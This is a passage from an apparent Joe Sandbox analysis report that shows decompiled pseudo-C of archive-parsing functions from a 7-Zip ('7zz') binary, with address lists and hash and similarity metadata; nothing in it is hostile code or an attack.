				 *_t134 =  *((intOrPtr*)(_t252 + 0x2e));
				_t193 =  *((intOrPtr*)(_t252 + 0x2f));
				 *((char*)(_t243 + 0x131)) =  *((intOrPtr*)(_t252 + 0x2f));
				if( *_t134 != 0) {
					E0042D0F8(_t193);
				}
				_t244 =  *(_t252 + 0x34);
				 *((intOrPtr*)(_t255 - 0x18)) =  *((intOrPtr*)(_t252 + 0x30));
				_t186 =  *(_t252 + 0x38);
				 *(_t255 - 0x14) =  *(_t252 + 0x3c);
				 *(_t255 - 0x10) =  *(_t252 + 0x40);
				 *((intOrPtr*)(_t255 - 0x48)) =  *((intOrPtr*)(_t252 + 0x44));
				_t228 = 0x14;
				_t139 = E0046B1C0(_t252 + 0x34, _t228);
				if( *((intOrPtr*)(_t255 - 0x18)) != 0 || (_t244 | _t186) != 0 || ( *(_t255 - 0x14) |  *(_t255 - 0x10)) != 0 ||  *((intOrPtr*)(_t255 - 0x48)) != 0) {
					__eflags = _t139 -  *((intOrPtr*)(_t255 - 0x18));
					if(_t139 !=  *((intOrPtr*)(_t255 - 0x18))) {
						E0042D0F8(0);
					}
					goto L24;
				} else {
					_t171 =  *_t252;
					_t143 =  *((intOrPtr*)( *_t171 + 0x10))(_t171, 0, 0, 1, _t255 - 0x1c);
					if(_t143 != 0) {
						L55:
						 *[fs:0x0] =  *((intOrPtr*)(_t255 - 0xc));
						return _t143;
					}
					_t172 =  *_t252;
					_t143 =  *((intOrPtr*)( *_t172 + 0x10))(_t172, 0, 0, 2, _t255 - 0x24);
					if(_t143 != 0) {
						goto L55;
					}
					_t221 =  *((intOrPtr*)(_t255 - 0x24));
					_t239 =  *((intOrPtr*)(_t255 - 0x20));
					_t248 = 0x1f4;
					_t174 = _t221 -  *((intOrPtr*)(_t255 - 0x1c));
					asm("sbb edx, [ebp-0x18]");
					 *((intOrPtr*)(_t255 - 0x48)) = _t239;
					if(_t174 == 0 && _t174 < 0x1f4) {
						_t248 = _t221 -  *((intOrPtr*)(_t255 - 0x1c));
					}
					_t222 =  *_t252;
					asm("cdq");
					_t143 =  *((intOrPtr*)( *_t222 + 0x10))(_t222,  ~_t248, _t239, 2, _t255 - 0x24);
					_t271 = _t143;
					if(_t143 == 0) {
						_t240 = _t255 - 0x248;
						_t143 = E0040FAC0(_t271, _t248);
						if(_t143 != 0) {
							goto L55;
						}
						_t37 = _t248 - 2; // 0x1f2
						_t224 = _t37;
						if(_t224 < 0) {
							L31:
							_t143 = 1;
							goto L55;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t178 =  *((intOrPtr*)(_t255 + _t224 - 0x248));
							if(_t178 == 0x17 &&  *((char*)(_t255 + _t224 - 0x247)) == 6) {
								break;
							}
							if(_t178 != 1 ||  *((char*)(_t255 + _t224 - 0x247)) != 4) {
								_t224 = _t224 - 1;
								if(_t224 >= 0) {
									continue;
								}
							}
							break;
						}
						if(_t224 < 0) {
							goto L31;
						}
						asm("cdq");
						 *(_t255 - 0x14) = _t248 - _t224;
						 *(_t255 - 0x10) = _t240;
						asm("cdq");
						_t186 = _t240;
						asm("sbb ebx, [ebp-0x18]");
						_t244 = _t224 -  *((intOrPtr*)(_t255 - 0x1c)) +  *((intOrPtr*)(_t255 - 0x24));
						asm("adc ebx, [ebp-0x20]");
						_t182 = E0046B1C0(_t255 + _t224 - 0x248,  *(_t255 - 0x14));
						 *((intOrPtr*)(_t255 - 0x48)) = _t182;
						_t183 =  *_t252;
						_t143 =  *((intOrPtr*)( *_t183 + 0x10))(_t183,  *((intOrPtr*)(_t255 - 0x1c)),  *((intOrPtr*)(_t255 - 0x18)), 0, 0);
						if(_t143 == 0) {
							L24:
							_t140 =  *((intOrPtr*)(_t255 + 8));
							asm("adc edx, 0x0");
							 *((intOrPtr*)(_t140 + 0x140)) =  *((intOrPtr*)(_t252 + 0x20)) + 0x20;
							 *((intOrPtr*)(_t140 + 0x144)) =  *((intOrPtr*)(_t252 + 0x24));
							__eflags =  *(_t255 - 0x14) |  *(_t255 - 0x10);
							if(( *(_t255 - 0x14) |  *(_t255 - 0x10)) != 0) {
								__eflags =  *(_t255 - 0x10);
								if( *(_t255 - 0x10) > 0) {
									goto L31;
								}
								__eflags =  *(_t255 - 0x14) - 0xffffffff;
								if( *(_t255 - 0x14) > 0xffffffff) {
									goto L31;
								}
								__eflags = _t186;
								if(__eflags > 0) {
									L32:
									_t144 =  *_t252;
									_t143 =  *((intOrPtr*)( *_t144 + 0x10))(_t144, _t244, _t186, 1, 0);
									__eflags = _t143;
									if(_t143 != 0) {
										goto L55;
									}
									 *((intOrPtr*)(_t255 - 0x2c)) = 0;
									 *((intOrPtr*)(_t255 - 0x28)) = 0;
									 *((intOrPtr*)(_t255 - 0x30)) = 0x47a7ec;
									 *(_t255 - 4) = 0;
									E0040FA26(_t255 - 0x30,  *(_t255 - 0x14));
									_t146 = E0040FAC0(__eflags,  *(_t255 - 0x14)); // executed
									__eflags = _t146;
									if(_t146 == 0) {
										asm("adc edx, 0x0");
										 *((intOrPtr*)(_t252 + 0x48)) =  *((intOrPtr*)(_t252 + 0x48)) +  *(_t255 - 0x14) + 0x20;
										asm("adc [esi+0x4c], edx");
										_t232 =  *(_t255 - 0x14);
										_t246 =  *((intOrPtr*)(_t255 + 8));
										asm("adc eax, ebx");
										asm("adc eax, 0x0");
										 *((intOrPtr*)(_t246 + 0x1c8)) = _t232 + _t244 + 0x20;
										_t208 =  *((intOrPtr*)(_t255 - 0x28));
										 *(_t246 + 0x1cc) =  *(_t255 - 0x10);
										_t148 = E0046B1C0( *((intOrPtr*)(_t255 - 0x28)), _t232);
										__eflags = _t148 -  *((intOrPtr*)(_t255 - 0x48));
										if(_t148 !=  *((intOrPtr*)(_t255 - 0x48))) {
											E0042D0F8(_t208);
										}
										 *(_t255 - 0x50) =  *(_t255 - 0x50) & 0x00000000;
										 *(_t255 - 4) = 1;
										E0042D093(_t252, _t255 - 0x30);
										 *((intOrPtr*)(_t255 - 0x40)) = 0;
										 *(_t255 - 0x3c) = 0;
										 *((intOrPtr*)(_t255 - 0x38)) = 0;
										 *((intOrPtr*)(_t255 - 0x34)) = 4;
										 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
										_t210 =  *((intOrPtr*)(_t252 + 0x18));
										 *(_t255 - 4) = 2;
										_t152 = E0042D1A5( *((intOrPtr*)(_t252 + 0x18)), _t232);
										__eflags = _t152 - 1;
										if(_t152 != 1) {
											L39:
											__eflags = _t152 - 0x17;
											if(_t152 != 0x17) {
												L41:
												E0042D0F8(_t210);
												L42:
												_push( *((intOrPtr*)(_t255 + 0x10)));
												_t211 = _t252;
												_push( *((intOrPtr*)(_t255 + 0xc)));
												_push(_t255 - 0x44);
												_push(_t246 + 0x150);
												_push( *((intOrPtr*)(_t246 + 0x144)));
												_push( *((intOrPtr*)(_t246 + 0x140)));
												_t156 = E0042E01C(_t252, _t232, __eflags); // executed
												__eflags = _t156;
												if(_t156 == 0) {
													__eflags =  *(_t255 - 0x3c);
													if( *(_t255 - 0x3c) != 0) {
														__eflags =  *(_t255 - 0x3c) - 1;
														if( *(_t255 - 0x3c) > 1) {
															E0042D0F8(_t211);
														}
														E0042CFE5(_t255 - 0x54);
														E0042D093(_t252,  *((intOrPtr*)( *((intOrPtr*)(_t255 - 0x38)))));
														_t214 =  *((intOrPtr*)(_t252 + 0x18));
														_t160 = E0042D1A5( *((intOrPtr*)(_t252 + 0x18)), _t232);
														__eflags = _t160 - 1;
														if(_t160 != 1) {
															L50:
															E0042D0F8(_t214);
															goto L51;
														} else {
															__eflags = _t232;
															if(_t232 == 0) {
																goto L51;
															}
															goto L50;
														}
													}
													 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
													 *(_t255 - 4) = 4;
													_t254 = 0;
													goto L53;
												}
												 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
												 *(_t255 - 4) = 3;
												goto L52;
											}
											__eflags = _t232;
											if(__eflags == 0) {
												goto L42;
											}
											goto L41;
										} else {
											__eflags = _t232;
											if(_t232 == 0) {
												L51:
												_push( *((intOrPtr*)(_t255 + 0x10)));
												 *((intOrPtr*)(_t246 + 0x1c0)) =  *((intOrPtr*)(_t252 + 0x48));
												_push( *((intOrPtr*)(_t255 + 0xc)));
												 *((intOrPtr*)(_t246 + 0x1c4)) =  *((intOrPtr*)(_t252 + 0x4c));
												_push(_t246);
												_t156 = E0042E3B2(_t252, _t232);
												 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
												 *(_t255 - 4) = 5;
												L52:
												_t254 = _t156;
												L53:
												E0040862D();
												 *(_t255 - 4) = 1;
												E00408604(_t255 - 0x44);
												_t123 = _t255 - 4;
												 *_t123 =  *(_t255 - 4) & 0x00000000;
												__eflags =  *_t123;
												E0042CFE5(_t255 - 0x54);
												L54:
												 *((intOrPtr*)(_t255 - 0x30)) = 0x47a7ec;
												E00407A18( *((intOrPtr*)(_t255 - 0x28)));
												_t143 = _t254;
												goto L55;
											}
											goto L39;
										}
									}
									_t254 = _t146;
									goto L54;
								}
								if(__eflags < 0) {
									goto L31;
								}
								__eflags = _t244;
								if(_t244 >= 0) {
									goto L32;
								}
								goto L31;
							}
							_t143 = 0;
							goto L55;
						}
					}
					goto L55;
				}
			}

0x0042ec61
0x0042ec6f
0x0042ec72
0x0042ec76
0x0042ec7e
0x0042ec87
0x0042ec90
0x0042ec96
0x0042ec98
0x0042ec9e
0x0042eca4
0x0042eca6
0x0042eca6
0x0042ecae
0x0042ecb1
0x0042ecb7
0x0042ecba
0x0042ecc3
0x0042eccb
0x0042ecce
0x0042eccf
0x0042ecd9
0x0042ee08
0x0042ee0b
0x0042ee0d
0x0042ee0d
0x00000000
0x0042ecfe
0x0042ecfe
0x0042ed0b
0x0042ed10
0x0042f013
0x0042f019
0x0042f021
0x0042f021
0x0042ed16
0x0042ed25
0x0042ed2a
0x00000000
0x00000000
0x0042ed30
0x0042ed33
0x0042ed38
0x0042ed3d
0x0042ed40
0x0042ed43
0x0042ed46
0x0042ed4f
0x0042ed4f
0x0042ed51
0x0042ed5f
0x0042ed63
0x0042ed66
0x0042ed68
0x0042ed71
0x0042ed77
0x0042ed7e
0x00000000
0x00000000
0x0042ed84
0x0042ed84
0x0042ed89
0x0042ee52
0x0042ee54
0x00000000
0x00000000
0x00000000
0x00000000
0x0042ed8f
0x0042ed8f
0x0042ed8f
0x0042ed98
0x00000000
0x00000000
0x0042eda6
0x0042edb2
0x0042edb3
0x00000000
0x00000000
0x0042edb3
0x00000000
0x0042eda6
0x0042edb7
0x00000000
0x00000000
0x0042edc1
0x0042edc2
0x0042edc7
0x0042edd1
0x0042edd4
0x0042eddc
0x0042eddf
0x0042ede2
0x0042ede5
0x0042edf1
0x0042edf4
0x0042edfc
0x0042ee01
0x0042ee12
0x0042ee18
0x0042ee1e
0x0042ee21
0x0042ee27
0x0042ee30
0x0042ee33
0x0042ee3c
0x0042ee40
0x00000000
0x00000000
0x0042ee42
0x0042ee46
0x00000000
0x00000000
0x0042ee48
0x0042ee4a
0x0042ee5a
0x0042ee5a
0x0042ee65
0x0042ee6a
0x0042ee6c
0x00000000
0x00000000
0x0042ee72
0x0042ee75
0x0042ee78
0x0042ee82
0x0042ee88
0x0042ee95
0x0042ee9a
0x0042ee9c
0x0042eeb0
0x0042eeb3
0x0042eeb6
0x0042eeb9
0x0042eec0
0x0042eec3
0x0042eec8
0x0042eecb
0x0042eed1
0x0042eed4
0x0042eeda
0x0042eedf
0x0042eee2
0x0042eee4
0x0042eee4
0x0042eee9
0x0042eef5
0x0042eef9
0x0042ef05
0x0042ef08
0x0042ef0b
0x0042ef0e
0x0042ef15
0x0042ef18
0x0042ef1b
0x0042ef1f
0x0042ef24
0x0042ef27
0x0042ef31
0x0042ef31
0x0042ef34
0x0042ef3a
0x0042ef3a
0x0042ef3f
0x0042ef3f
0x0042ef45
0x0042ef47
0x0042ef4a
0x0042ef51
0x0042ef52
0x0042ef58
0x0042ef5e
0x0042ef63
0x0042ef65
0x0042ef70
0x0042ef74
0x0042ef81
0x0042ef85
0x0042ef87
0x0042ef87
0x0042ef8f
0x0042ef9d
0x0042efa2
0x0042efa5
0x0042efaa
0x0042efad
0x0042efb3
0x0042efb3
0x00000000
0x0042efaf
0x0042efaf
0x0042efb1
0x00000000
0x00000000
0x00000000
0x0042efb1
0x0042efad
0x0042ef76
0x0042ef79
0x0042ef7d
0x00000000
0x0042ef7d
0x0042ef67
0x0042ef6a
0x00000000
0x0042ef6a
0x0042ef36
0x0042ef38
0x00000000
0x00000000
0x00000000
0x0042ef29
0x0042ef29
0x0042ef2b
0x0042efb8
0x0042efb8
0x0042efbe
0x0042efc7
0x0042efcc
0x0042efd2
0x0042efd3
0x0042efd8
0x0042efdb
0x0042efdf
0x0042efdf
0x0042efe1
0x0042efe4
0x0042efec
0x0042eff0
0x0042eff5
0x0042eff5
0x0042eff5
0x0042effc
0x0042f001
0x0042f004
0x0042f00b
0x0042f011
0x00000000
0x0042f011
0x00000000
0x0042ef2b
0x0042ef27
0x0042ee9e
0x00000000
0x0042ee9e
0x0042ee4c
0x00000000
0x00000000
0x0042ee4e
0x0042ee50
0x00000000
0x00000000
0x00000000
0x0042ee50
0x0042ee35
0x00000000
0x0042ee35
0x0042ee03
0x00000000
0x0042ed68

APIs

__EH_prolog.LIBCMT ref: 0042EC61

Strings

c[@, xrefs: 0042EE78, 0042EEF3, 0042F004

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: c[@
API String ID: 3519838083-2588109156
Opcode ID: 8a64972ee4c077eab65c48b087dce4589bc7ef48ef535aabefce3003df9f5d4d
Instruction ID: bcf0ec3d1ae188e7939240ae46176005842349514c47eef13008c3777b72f97c
Opcode Fuzzy Hash: 8a64972ee4c077eab65c48b087dce4589bc7ef48ef535aabefce3003df9f5d4d
Instruction Fuzzy Hash: A3C19D70B00219AFDF24CFA6D980BEEBBB1BF48304F64442EE405A7341DB79A945CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042E01C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 260
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0042E01C(intOrPtr* __ecx, signed int __edx, void* __eflags) {
				intOrPtr _t192;
				intOrPtr* _t198;
				intOrPtr _t203;
				void* _t221;
				void* _t228;
				intOrPtr _t269;
				signed int _t273;
				intOrPtr* _t275;
				intOrPtr* _t279;
				intOrPtr* _t281;
				intOrPtr* _t285;
				void* _t286;
				void* _t291;

				_t291 = __eflags;
				_t273 = __edx;
				E0046B890(E004775CD, _t286);
				_t275 = __ecx;
				E00404AD0(_t286 - 0x5c, 8);
				 *((intOrPtr*)(_t286 - 0x5c)) = 0x47a688;
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				E00404AD0(_t286 - 0xd8, 1);
				 *((intOrPtr*)(_t286 - 0xd8)) = 0x47ab08;
				E00404AD0(_t286 - 0xc4, 4);
				 *((intOrPtr*)(_t286 - 0xc4)) = 0x47ab80;
				 *(_t286 - 4) = 2;
				E00405B9F(_t286 - 0x30);
				 *((intOrPtr*)(_t286 - 0x30)) = 0x47b3a8;
				E00404AD0(_t286 - 0x84, 4);
				 *((intOrPtr*)(_t286 - 0x84)) = 0x47ab80;
				E00404AD0(_t286 - 0x9c, 8);
				 *((intOrPtr*)(_t286 - 0x9c)) = 0x47a688;
				E00404AD0(_t286 - 0xb0, 1);
				 *((intOrPtr*)(_t286 - 0xb0)) = 0x47ab08;
				E00404AD0(_t286 - 0x70, 4);
				 *((intOrPtr*)(_t286 - 0x70)) = 0x47ab80;
				_t279 =  *((intOrPtr*)(_t286 + 0x10));
				 *(_t286 - 4) = 7;
				E0042DE7C(__ecx, __edx, 0, _t279, _t286 - 0x5c, _t286 - 0xd8, _t286 - 0xc4, _t286 - 0x30, _t286 - 0x84, _t286 - 0x9c, _t286 - 0xb0, _t286 - 0x70);
				 *(_t286 - 0x14) =  *(_t286 - 0x14) & 0x00000000;
				E00426448(_t286 - 0x164, _t291, 1);
				_t228 =  *_t279 +  *((intOrPtr*)(_t286 + 8));
				asm("adc esi, [ebp+0xc]");
				 *(_t286 + 0xc) =  *(_t286 + 0xc) & 0x00000000;
				 *((intOrPtr*)(_t286 - 0x34)) =  *((intOrPtr*)(_t279 + 4));
				if( *((intOrPtr*)(_t286 - 0x28)) <= 0) {
					L17:
					 *(_t286 - 4) = 7;
					E00429925(_t286 - 0x164, _t303); // executed
					 *(_t286 - 4) = 6;
					E00408604(_t286 - 0x70);
					 *(_t286 - 4) = 5;
					E00408604(_t286 - 0xb0);
					 *(_t286 - 4) = 4;
					E00408604(_t286 - 0x9c);
					 *(_t286 - 4) = 3;
					E00408604(_t286 - 0x84);
					 *((intOrPtr*)(_t286 - 0x30)) = 0x47b3a8;
					 *(_t286 - 4) = 0xc;
					_t281 = 0;
					L18:
					E0040862D();
					 *(_t286 - 4) = 2;
					E00408604(_t286 - 0x30);
					 *(_t286 - 4) = 1;
					E00408604(_t286 - 0xc4);
					 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
					E00408604(_t286 - 0xd8);
					 *(_t286 - 4) =  *(_t286 - 4) | 0xffffffff;
					E00408604(_t286 - 0x5c);
					 *[fs:0x0] =  *((intOrPtr*)(_t286 - 0xc));
					return _t281;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					 *(_t286 - 0x40) =  *(_t286 - 0x40) & 0x00000000;
					 *(_t286 - 0x3c) =  *(_t286 - 0x3c) & 0x00000000;
					 *((intOrPtr*)(_t286 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t286 - 0x24)) +  *(_t286 + 0xc) * 4));
					 *((intOrPtr*)(_t286 - 0x44)) = 0x47a7ec;
					_push(_t286 - 0x44);
					 *(_t286 - 4) = 9;
					E0042F129( *((intOrPtr*)(_t286 + 0x14)));
					 *(_t286 - 4) = 8;
					 *((intOrPtr*)(_t286 - 0x44)) = 0x47a7ec;
					E00407A18( *(_t286 - 0x3c));
					_t192 =  *((intOrPtr*)(_t286 + 0x14));
					_t284 =  *( *((intOrPtr*)(_t192 + 0xc)) +  *(_t192 + 8) * 4 - 4);
					 *(_t286 - 0x10) =  *( *((intOrPtr*)(_t192 + 0xc)) +  *(_t192 + 8) * 4 - 4);
					 *(_t286 - 0x1c) = E00429826( *((intOrPtr*)(_t286 + 0x10)));
					_t257 =  *(_t286 - 0x1c);
					if( *(_t286 - 0x1c) !=  *(_t286 - 0x1c) || 0 != _t273) {
						E0042D0F8(_t257);
					}
					E0040FA26(_t284,  *(_t286 - 0x1c));
					_push(0x14);
					_t198 = E004079F2();
					_t285 = 0;
					if(_t198 != 0) {
						 *((intOrPtr*)(_t198 + 4)) = 0;
						 *_t198 = 0x47b3d0;
						_t285 = _t198;
					}
					_t296 = _t285;
					 *((intOrPtr*)(_t286 - 0x88)) = _t285;
					if(_t285 != 0) {
						 *((intOrPtr*)( *_t285 + 4))(_t285);
					}
					_t273 =  *(_t286 - 0x14);
					 *((intOrPtr*)(_t285 + 8)) =  *((intOrPtr*)( *(_t286 - 0x10) + 8));
					 *((intOrPtr*)(_t285 + 0x10)) = 0;
					 *(_t285 + 0xc) =  *(_t286 - 0x1c);
					 *(_t286 - 4) = 0xa;
					_t203 = E004264F7(_t286 - 0x164, _t296,  *_t275, _t228,  *((intOrPtr*)(_t286 - 0x34)),  *(_t286 - 0x50) + _t273 * 8,  *((intOrPtr*)(_t286 + 0x10)), _t285, 0,  *((intOrPtr*)(_t286 + 0x18)),  *((intOrPtr*)(_t286 + 0x1c)), 0, 1); // executed
					 *((intOrPtr*)(_t286 - 0x48)) = _t203;
					if(_t203 != 0) {
						break;
					}
					if( *((char*)( *((intOrPtr*)(_t286 + 0x10)) + 0x54)) != 0) {
						_t273 =  *(_t286 - 0x1c);
						_t221 = E0046B1C0( *((intOrPtr*)( *(_t286 - 0x10) + 8)), _t273);
						_t272 =  *((intOrPtr*)(_t286 + 0x10));
						if(_t221 !=  *((intOrPtr*)( *((intOrPtr*)(_t286 + 0x10)) + 0x50))) {
							E0042D0F8(_t272);
						}
					}
					 *(_t286 - 0x10) =  *(_t286 - 0x10) & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t286 + 0x10)) + 0x30)) <= 0) {
						L14:
						 *(_t286 - 4) = 8;
						if(_t285 != 0) {
							 *((intOrPtr*)( *_t285 + 8))(_t285);
						}
						 *(_t286 + 0xc) =  *(_t286 + 0xc) + 1;
						_t303 =  *(_t286 + 0xc) -  *((intOrPtr*)(_t286 - 0x28));
						if( *(_t286 + 0xc) <  *((intOrPtr*)(_t286 - 0x28))) {
							continue;
						} else {
							goto L17;
						}
					} else {
						do {
							_t273 =  *(_t286 - 0x50);
							 *(_t286 - 0x14) =  *(_t286 - 0x14) + 1;
							_t269 =  *((intOrPtr*)(( *(_t286 - 0x14) << 3) + _t273));
							_t228 = _t228 + _t269;
							asm("adc [ebp-0x34], eax");
							 *((intOrPtr*)(_t275 + 0x48)) =  *((intOrPtr*)(_t275 + 0x48)) + _t269;
							asm("adc [edi+0x4c], eax");
							 *(_t286 - 0x10) =  *(_t286 - 0x10) + 1;
						} while ( *(_t286 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t286 + 0x10)) + 0x30)));
						goto L14;
					}
				}
				__eflags = _t285;
				 *(_t286 - 4) = 8;
				if(__eflags != 0) {
					 *((intOrPtr*)( *_t285 + 8))(_t285);
				}
				 *(_t286 - 4) = 7;
				E00429925(_t286 - 0x164, __eflags);
				 *(_t286 - 4) = 6;
				E00408604(_t286 - 0x70);
				 *(_t286 - 4) = 5;
				E00408604(_t286 - 0xb0);
				 *(_t286 - 4) = 4;
				E00408604(_t286 - 0x9c);
				 *(_t286 - 4) = 3;
				E00408604(_t286 - 0x84);
				 *((intOrPtr*)(_t286 - 0x30)) = 0x47b3a8;
				_t281 =  *((intOrPtr*)(_t286 - 0x48));
				 *(_t286 - 4) = 0xb;
				goto L18;
			}

0x0042e01c
0x0042e01c
0x0042e021
0x0042e02f
0x0042e036
0x0042e03b
0x0042e042
0x0042e04e
0x0042e058
0x0042e066
0x0042e070
0x0042e079
0x0042e07d
0x0042e082
0x0042e091
0x0042e096
0x0042e0a4
0x0042e0a9
0x0042e0bb
0x0042e0c0
0x0042e0cb
0x0042e0d0
0x0042e0d6
0x0042e10a
0x0042e10e
0x0042e113
0x0042e11f
0x0042e129
0x0042e12c
0x0042e12f
0x0042e137
0x0042e13a
0x0042e2a3
0x0042e2a9
0x0042e2ad
0x0042e2b5
0x0042e2b9
0x0042e2c4
0x0042e2c8
0x0042e2d3
0x0042e2d7
0x0042e2e2
0x0042e2e6
0x0042e2eb
0x0042e2f2
0x0042e2f6
0x0042e2f8
0x0042e2fb
0x0042e303
0x0042e307
0x0042e312
0x0042e316
0x0042e31b
0x0042e325
0x0042e32a
0x0042e331
0x0042e33e
0x0042e346
0x00000000
0x00000000
0x00000000
0x0042e140
0x0042e140
0x0042e146
0x0042e14a
0x0042e156
0x0042e159
0x0042e162
0x0042e163
0x0042e167
0x0042e16f
0x0042e173
0x0042e176
0x0042e17b
0x0042e185
0x0042e18c
0x0042e194
0x0042e199
0x0042e19e
0x0042e1a4
0x0042e1a4
0x0042e1ae
0x0042e1b3
0x0042e1b5
0x0042e1ba
0x0042e1bf
0x0042e1c1
0x0042e1c4
0x0042e1ca
0x0042e1ca
0x0042e1cc
0x0042e1ce
0x0042e1d4
0x0042e1d9
0x0042e1d9
0x0042e1ea
0x0042e1ed
0x0042e1f6
0x0042e1f9
0x0042e209
0x0042e219
0x0042e220
0x0042e223
0x00000000
0x00000000
0x0042e230
0x0042e235
0x0042e23b
0x0042e240
0x0042e246
0x0042e248
0x0042e248
0x0042e246
0x0042e250
0x0042e258
0x0042e286
0x0042e288
0x0042e28c
0x0042e291
0x0042e291
0x0042e294
0x0042e29a
0x0042e29d
0x00000000
0x00000000
0x00000000
0x00000000
0x0042e25a
0x0042e25a
0x0042e25d
0x0042e263
0x0042e266
0x0042e26d
0x0042e26f
0x0042e272
0x0042e275
0x0042e278
0x0042e281
0x00000000
0x0042e25a
0x0042e258
0x0042e349
0x0042e34b
0x0042e34f
0x0042e354
0x0042e354
0x0042e35d
0x0042e361
0x0042e369
0x0042e36d
0x0042e378
0x0042e37c
0x0042e387
0x0042e38b
0x0042e396
0x0042e39a
0x0042e39f
0x0042e3a6
0x0042e3a9
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0042E021

Part of subcall function 0042F129: __EH_prolog.LIBCMT ref: 0042F12E

Strings

c[@, xrefs: 0042E151

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: c[@
API String ID: 3519838083-2588109156
Opcode ID: 37a9ed40db553d9be7e5d6efad5c6be87b7fe848da45eb624cf300f350e8dd1e
Instruction ID: 13632c0e7c80ea0d0342c65c90266a16cd9ecf8cb86b77326c192e1623b2d142
Opcode Fuzzy Hash: 37a9ed40db553d9be7e5d6efad5c6be87b7fe848da45eb624cf300f350e8dd1e
Instruction Fuzzy Hash: 05C14A70D00268DFDB14DF95D945BEEB7B4BF14308F14809EE909A7291CB786A48CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041003E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041003E(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
				void* _t125;
				intOrPtr* _t128;
				void* _t142;
				signed int _t168;
				intOrPtr* _t175;
				intOrPtr _t176;
				signed int _t208;
				void* _t209;
				signed int _t212;
				void* _t218;

				E0046B890(E00474107, _t218);
				 *((intOrPtr*)(_t218 - 0x24)) = __edx;
				E00405B9F(_t218 - 0x38);
				 *((intOrPtr*)(_t218 - 0x38)) = 0x47a420;
				_t168 = 0;
				 *(_t218 - 4) = 0;
				L14();
				 *(_t218 - 4) = 1;
				E00405B9F(_t218 - 0x20);
				 *((intOrPtr*)(_t218 - 0x20)) = 0x47a420;
				 *(_t218 - 4) = 2;
				E00404AD0(_t218 - 0x74, 4);
				 *((intOrPtr*)(_t218 - 0x74)) = 0x47a9ac;
				_push(_t218 - 0x74);
				_push(_t218 - 0x20);
				_push(0);
				_t175 = __ecx;
				 *(_t218 - 4) = 3;
				_t125 = E00415349(__ecx, _t218 - 0xc4); // executed
				if(_t125 != 0 ||  *(_t218 - 0x18) > 0) {
					 *(_t218 + 8) = "cannot find archive";
					E0046B8F4(_t218 + 8, 0x47cf70);
					_push(0x47a420);
					_t128 = _t175;
					__eflags = 0;
					_t176 = 4;
					 *((intOrPtr*)(_t128 + 4)) = 0;
					 *((intOrPtr*)(_t128 + 8)) = 0;
					 *((intOrPtr*)(_t128 + 0xc)) = 0;
					 *((intOrPtr*)(_t128 + 0x10)) = _t176;
					 *_t128 = 0x47a420;
					 *((intOrPtr*)(_t128 + 0x18)) = 0;
					 *((intOrPtr*)(_t128 + 0x1c)) = 0;
					 *((intOrPtr*)(_t128 + 0x20)) = 0;
					 *((intOrPtr*)(_t128 + 0x24)) = _t176;
					 *((intOrPtr*)(_t128 + 0x14)) = 0x47a668;
					 *((intOrPtr*)(_t128 + 0x2c)) = 0;
					 *((intOrPtr*)(_t128 + 0x30)) = 0;
					 *((intOrPtr*)(_t128 + 0x34)) = 0;
					 *((intOrPtr*)(_t128 + 0x38)) = _t176;
					 *((intOrPtr*)(_t128 + 0x28)) = 0x47a668;
					 *((intOrPtr*)(_t128 + 0x40)) = 0;
					 *((intOrPtr*)(_t128 + 0x44)) = 0;
					 *((intOrPtr*)(_t128 + 0x48)) = 0;
					 *((intOrPtr*)(_t128 + 0x4c)) = _t176;
